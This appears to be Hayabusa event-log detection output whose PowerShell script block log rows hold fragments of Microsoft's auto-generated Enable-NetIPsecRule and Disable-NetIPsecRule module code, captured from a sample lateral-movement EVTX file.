[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) 
$__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) 
$__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ment.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
